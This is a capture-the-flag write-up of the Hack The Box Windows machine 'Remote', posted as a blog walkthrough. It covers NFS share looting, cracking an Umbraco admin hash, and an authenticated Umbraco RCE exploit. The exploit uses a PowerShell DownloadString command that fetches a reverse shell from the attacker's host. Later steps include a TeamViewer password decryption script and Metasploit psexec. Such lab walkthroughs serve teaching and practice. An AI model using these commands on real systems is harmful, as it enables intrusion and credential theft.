Hack the Box: Remote

Eswar Abisheak
9 min readSep 7, 2020

--

What should I know in order to hack this box ?

Release Date: 21-March-2020
Retire Date:
05 Sep 2020
OS:
Windows
Base Points:
Easy [20]
Prepared By:
MrR3boot
Machine Author(s):
mrb3n

What is the specialty of remote?

Remote is an easy Windows machine that features an Umbraco CMS installation.Credentials are found in a world-readable NFS share. Using these, an authenticated UmbracoCMS exploit is leveraged to gain a foothold. A vulnerable TeamViewer version is identified, fromwhich we can gain a password. This password has been reused with the local administrator account. Using psexec with these credentials returns a SYSTEM shell.

What did I learn form this box?

  1. NFS Enumeration
  2. CMS Exploitation
  3. TeamViewer Credential Gathering
  4. SeImpersonate Privilege Abuse
  5. Mounted

Enumeration

Nmap

I use nmap to do the work for me 😏

kali@kali:~$ nmap -sC -sV -oA scan 10.10.10.180
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-07 13:36 EDT
Nmap scan report for 10.10.10.180
Host is up (0.27s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
2049/tcp open mountd 1-3 (RPC #100005)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 5m48s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-09-07T17:44:13
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 259.75 seconds

Things to look for in an Nmap scan

  1. FTP
  2. TCP
  3. SMB
  4. RPCinfo
  5. HTTP

Why only them ?

Hmm,I too ask the same question but at the end of the day I find out that they are the only listening ports in that box, So I could find some clues to proceed further.

DirBuster

When you see a open port
80/tcp
I would go for Directory Traversal and check all the urls for clues.I know its a tedious process but believe me or not ,most of the time I find really important suff .

kali@kali:~$ dirb http://10.10.10.180/-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon Sep 3 13:55:00 2020
URL_BASE: http://10.10.10.180/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------GENERATED WORDS: 4612---- Scanning URL: http://10.10.10.180/ ----
+ http://10.10.10.180/about-us (CODE:200|SIZE:5441)
+ http://10.10.10.180/blog (CODE:200|SIZE:5001)
+ http://10.10.10.180/Blog (CODE:200|SIZE:5001)
+ http://10.10.10.180/contact (CODE:200|SIZE:7880)
+ http://10.10.10.180/Contact (CODE:200|SIZE:7880)
+ http://10.10.10.180/home (CODE:200|SIZE:6703)
+ http://10.10.10.180/Home (CODE:200|SIZE:6703)
+ http://10.10.10.180/install (CODE:302|SIZE:126)
+ http://10.10.10.180/intranet (CODE:200|SIZE:3323)
+ http://10.10.10.180/master (CODE:500|SIZE:3420)
+ http://10.10.10.180/people (CODE:200|SIZE:6739)
+ http://10.10.10.180/People (CODE:200|SIZE:6739)
+ http://10.10.10.180/person (CODE:200|SIZE:2741)
+ http://10.10.10.180/product (CODE:500|SIZE:3420)
+ http://10.10.10.180/products (CODE:200|SIZE:5328)
+ http://10.10.10.180/umbraco (CODE:200|SIZE:5328)

Take away from the DirBuster
Umbraco CMS

I found out three different exploits and none of them worked 😅

FTP

ftp-anon: Anonymous FTP login allowed (FTP code 230)

Let’s login to FTP with the credentials anonymous:anonymous as it is the default one for them

kali@kali:~$ ftp 10.10.10.180
Connected to 10.10.10.180.
220 Microsoft FTP Service
Name (10.10.10.180:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.

For now there are not files in the ftp.I couldn't upload any of them too.We can ignore this service for now.

Remote Procedure Call Information

Port 111 is open, let’s enumerate it. It is running rpcbind service. The nmap scan report clearly shows rpcinfo (Remote Procedure Call Information) and list of ports along with their services. For confirmation and removal of false positive results you can use the command rpcinfo to reveal the exact running services.

Checking RPCinfo:-

kali@kali:~$ rpcinfo -p 10.10.10.180
program vers proto port service
100000 2 udp 111 portmapper
100000 3 udp 111 portmapper
100000 4 udp 111 portmapper
100000 2 tcp 111 portmapper
100000 3 tcp 111 portmapper
100000 4 tcp 111 portmapper
100003 2 tcp 2049 nfs
100003 3 tcp 2049 nfs
100003 2 udp 2049 nfs
100003 3 udp 2049 nfs
100003 4 tcp 2049 nfs
100005 1 tcp 2049 mountd
100005 2 tcp 2049 mountd
100005 3 tcp 2049 mountd
100005 1 udp 2049 mountd
100005 2 udp 2049 mountd
100005 3 udp 2049 mountd
100021 1 tcp 2049 nlockmgr
100021 2 tcp 2049 nlockmgr
100021 3 tcp 2049 nlockmgr
100021 4 tcp 2049 nlockmgr
100021 1 udp 2049 nlockmgr
100021 2 udp 2049 nlockmgr
100021 3 udp 2049 nlockmgr
100021 4 udp 2049 nlockmgr
100024 1 tcp 2049 status
100024 1 udp 2049 status

hmm,Rpcinfo revealed that nfs [Network file System] and mounted services are running. OK that’s interesting

NFS

It took me a day to know about it NFS

To install a tool run

sudo apt-get install nfs-common

So I have look for shared folders and files

kali@kali:~$ sudo showmount -e 10.10.10.180
Export list for 10.10.10.180:
/site_backups (everyone)

The site_backups folder is accessible to everyone. Let’s mount this folder on our machine.

kali@kali:~$ cd backups
kali@kali:~/Desktop/backups$ strings App_Data/Umbraco.sdf | grep admin
Administratoradmindefaulten-US
Administratoradmindefaulten-USb22924d5-57de-468e-9df4-0961cf6aa30d
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-US82756c26-4321-4d27-b429-1b5c7c4f882f
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/password/changepassword change
User "admin" <admin@htb.local>192.168.195.1User "admin"

It contains username : admin@htb.local and password in SHA1 hash form which is ‘b8be16afba8c314ad33d812f22a04991b90e2aaa‘. Tried to search the hash online on some public databases and luckily got its password on crackstation.net which is baconandcheese. So the login credential is admin@htb.local : baconandcheese.

FOOTHOLD

We can login to Umbraco CMS with the admin@htb.local / baconandcheese credentials.Clicking the Help icon in the bottom-left reveals that the version of the CMS is 7.12.4.This version suffers from an authenticated remote code execution vulnerability, for which a public exploit is available.

https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1

Let’s try the github way 😄

As there is an authenticated RCE vulnerability in Umbraco 7.12.4 so searched over GitHub for Umbraco RCE exploit and its usage. Got this link https://github.com/noraj/Umbraco-RCE and downloaded it. Then downloaded PowerShell script Invoke-PowerShellTcp.ps1 from https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1

which helps to connect back to the netcat listener on our PC. Replaced the old IP address with my local PC IP address port 5555.

Exploit Execution

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.179 -Port 5555kali@kali:~/Downloads/Umbraco-RCE-master$ python exploit.py -u admin@htb.local -p baconandcheese -i http://10.10.10.180/ -c powershell.exe -a "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.179/Invoke-PowerShellTcp.ps1')"

Start Python Http Server

kali@kali:~/Downloads/Umbraco-RCE-master$ sudo python3  -m http.server 80

Start NetCat Listener

kali@kali:~/Downloads/Umbraco-RCE-master$ sudo rlwrap nc -nvlp 5555
listening on [any] 5555 ...
connect to [10.10.14.179] from (UNKNOWN) [10.10.10.180] 49764
Windows PowerShell running as user REMOTE$ on REMOTE
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\windows\system32\inetsrv>whoami
iis apppool\defaultapppool
PS C:\windows\system32\inetsrv> cd ..
PS C:\windows\system32> cd ..
PS C:\windows> cd ..
PS C:\> ls
Directory: C:\Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/20/2020 1:13 AM ftp_transfer
d----- 2/19/2020 3:11 PM inetpub
d----- 2/19/2020 11:09 PM Microsoft
d----- 9/15/2018 3:19 AM PerfLogs
d-r--- 2/23/2020 2:19 PM Program Files
d----- 2/23/2020 2:19 PM Program Files (x86)
d----- 9/7/2020 12:05 AM site_backups
d-r--- 2/19/2020 3:12 PM Users
d----- 2/20/2020 12:52 AM Windows
PS C:\> cd users
PS C:\users> ls
Directory: C:\usersMode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/19/2020 3:12 PM .NET v2.0
d----- 2/19/2020 3:12 PM .NET v2.0 Classic
d----- 2/19/2020 3:12 PM .NET v4.5
d----- 2/19/2020 3:12 PM .NET v4.5 Classic
d----- 9/7/2020 1:09 AM Administrator
d----- 2/19/2020 3:12 PM Classic .NET AppPool
d-r--- 2/20/2020 2:42 AM Public
PS C:\users> cd Public
PS C:\users\Public> ls
Directory: C:\users\PublicMode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 2/19/2020 3:03 PM Documents
d-r--- 9/15/2018 3:19 AM Downloads
d-r--- 9/15/2018 3:19 AM Music
d-r--- 9/15/2018 3:19 AM Pictures
d-r--- 9/15/2018 3:19 AM Videos
-ar--- 9/7/2020 1:21 AM 34 user.txt
PS C:\users\Public> type user.txt
90af1f2df661f235f22caaaa5d6df686

Hmm tats cool and we got the user hurray.

Privilege Escalation

https://whynotsecurity.com/blog/teamviewer/

Having gained a foothold, we can now enumerate the host. Checking for running services reveals the TeamViewer service.

 powershell.exe(Get-Command"C:\Program Files(x86)\TeamViewer\Version7\TeamViewer.exe").Version

In vulnerable versions, AES-128-CBCencrypted user passwords are stored in the Windows registry using the known key0602000000a400005253413100040000 and the iv 0100010067244F436E6762F25EA8D704.Let’s background the session and use the Metasploit teamViewer_passwords module to gather the credentials.

 C:\> cd HKLM:\software\wow6432node\teamviewer\version7
HKLM:\software\wow6432node\teamviewer\version7> get-itemproperty -path .

StartMenuGroup : TeamViewer 7
InstallationDate : 2020-02-20
InstallationDirectory : C:\Program Files (x86)\TeamViewer\Version7
Always_Online : 1
Security_ActivateDirectIn : 0
Version : 7.0.43148
ClientIC : 301094961
PK : {191, 173, 42, 237...}
SK : {248, 35, 152, 56...}
LastMACUsed : {, 005056B99509}
MIDInitiativeGUID : {514ed376-a4ee-4507-a28b-484604ed0ba0}
MIDVersion : 1
ClientID : 1769137322
CUse : 1
LastUpdateCheck : 1584564540
UsageEnvironmentBackup : 1
SecurityPasswordAES : {255, 155, 28, 115...}
MultiPwdMgmtIDs : {admin}
MultiPwdMgmtPWDs : {357BC4C8F33160682B01AE2D1C987C3FE2BAE09455B94A1919C4CD4984593A77}
Security_PasswordStrength : 3
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\software\wow6432node\teamviewer\vers
ion7
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\software\wow6432node\teamviewer
PSChildName : version7
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\Registry
HKLM:\software\wow6432node\teamviewer\version7> (get-itemproperty -path .).SecurityPasswordAES
255
155
28
115
214
107
206
49
172
65
62
174
19
27
70
79
88
47
108
226
209
225
243
218
126
141
55
107
38
57
78
91

After a bit of googling found the script in msfconsole

#!/usr/bin/env python3

from Crypto.Cipher import AES

key = b"\x06\x02\x00\x00\x00\xa4\x00\x00\x52\x53\x41\x31\x00\x04\x00\x00"
iv = b"\x01\x00\x01\x00\x67\x24\x4F\x43\x6E\x67\x62\xF2\x5E\xA8\xD7\x04"
ciphertext = bytes([255, 155, 28, 115, 214, 107, 206, 49, 172, 65, 62, 174,
19, 27, 70, 79, 88, 47, 108, 226, 209, 225, 243, 218,
126, 141, 55, 107, 38, 57, 78, 91])

aes = AES.new(key, AES.MODE_CBC, IV=iv)
password = aes.decrypt(ciphertext).decode("utf-16").rstrip("\x00")

print(f"[+] Found password: {password}")

The script output reveals the password !R3m0te!. The TeamViewer password by itself doesn’t provide us with elevated access.

Using psexec module in msfconsole

use exploit/windows/smb/psexec
set RHOSTS 10.10.10.180
set SMBPass !R3m0te!
set SMBUser administrator
set LHOST tun0
exploit

This is successful, and we can access the root.txt on the administrator Desktop.

Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>cd ..
ccd ..
C:\Windows>cd ..
ccd ..
'ccd' is not recognized as an internal or external command,
operable program or batch file.
C:\Windows>cd ..
cd ..
C:\>cd users
cd users
C:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is BE23-EB3E
Directory of C:\Users02/19/2020 04:12 PM <DIR> .
02/19/2020 04:12 PM <DIR> ..
02/19/2020 04:12 PM <DIR> .NET v2.0
02/19/2020 04:12 PM <DIR> .NET v2.0 Classic
02/19/2020 04:12 PM <DIR> .NET v4.5
02/19/2020 04:12 PM <DIR> .NET v4.5 Classic
09/07/2020 01:09 AM <DIR> Administrator
02/19/2020 04:12 PM <DIR> Classic .NET AppPool
02/20/2020 03:42 AM <DIR> Public
0 File(s) 0 bytes
9 Dir(s) 19,159,539,712 bytes free
C:\Users>cd Administrator
cd Administrator
C:\Users\Administrator>ls
ls
'ls' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\Administrator>C:\Users\Administrator>dir
dir
Volume in drive C has no label.
Volume Serial Number is BE23-EB3E
Directory of C:\Users\Administrator09/07/2020 01:09 AM <DIR> .
09/07/2020 01:09 AM <DIR> ..
02/19/2020 04:03 PM <DIR> 3D Objects
02/19/2020 04:03 PM <DIR> Contacts
02/20/2020 03:41 AM <DIR> Desktop
02/19/2020 05:26 PM <DIR> Documents
02/23/2020 02:22 PM <DIR> Downloads
02/19/2020 04:03 PM <DIR> Favorites
02/19/2020 04:03 PM <DIR> Links
02/19/2020 04:03 PM <DIR> Music
02/19/2020 04:03 PM <DIR> Pictures
02/19/2020 04:03 PM <DIR> Saved Games
02/20/2020 01:45 AM <DIR> Searches
02/19/2020 04:03 PM <DIR> Videos
0 File(s) 0 bytes
14 Dir(s) 19,159,539,712 bytes free
C:\Users\Administrator>cd Desktopcd DesktopC:\Users\Administrator\Desktop>
C:\Users\Administrator\Desktop>type root.txt
type root.txt
ee7491b9fbb1a1b6f6730c4ed1de0e6a

This is how I rooted Remote HTB machine. Learnt a lot after hunting this box. Hope you guys have also learnt some new things from this box walkthrough. Thanks for reading this writeup. For any suggestion and query related to walkthrough, feel free to use the comments section

--

--

Eswar Abisheak
Eswar Abisheak

Written by Eswar Abisheak

DSCVIIT lead || https://eswar.dev || HTB player || Competitive Coding

No responses yet